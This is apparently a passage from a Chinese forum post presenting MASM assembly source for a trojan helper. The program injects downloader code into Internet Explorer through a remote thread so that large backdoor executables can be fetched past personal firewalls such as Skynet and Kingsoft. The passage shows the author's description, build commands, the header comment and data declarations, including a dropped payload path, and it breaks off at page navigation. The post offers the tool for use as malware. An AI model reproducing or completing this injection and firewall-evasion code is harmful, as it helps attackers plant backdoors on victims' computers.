|
大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候 后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到) 所以写了这个程序。。。。
编绎参数: C:\masm32\BIN>type ii.bat ml /c /coff i.asm link /subsystem:windows i.obj
刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。
; #--------------------------------------# # ; # Injection downloadcode in IE --> # # ; # -->also it can jump personal fire wall # # ; # 2004.07.15 # ; # codz: czy # # ; #------------------------------------------# #
;test on win2k server sp4 masm8
.386 .model flat,stdcall option casemap:none
include ../include/user32.inc includelib ../lib/user32.lib include ../include/kernel32.inc includelib ../lib/kernel32.lib include ../include/windows.inc
.data hello db ’2K下建远程线程’,0 tit db ’IEFrame’,0 szFormat db ’PID是:%d’,0 szBuffer dd 20 dup(0),0 pid dd 0 hProcess dd 0 hThread dd 0 pCodeRemote dd 0 path1 db ’c:\a.EXE’,0
[1] [2] 下一页 |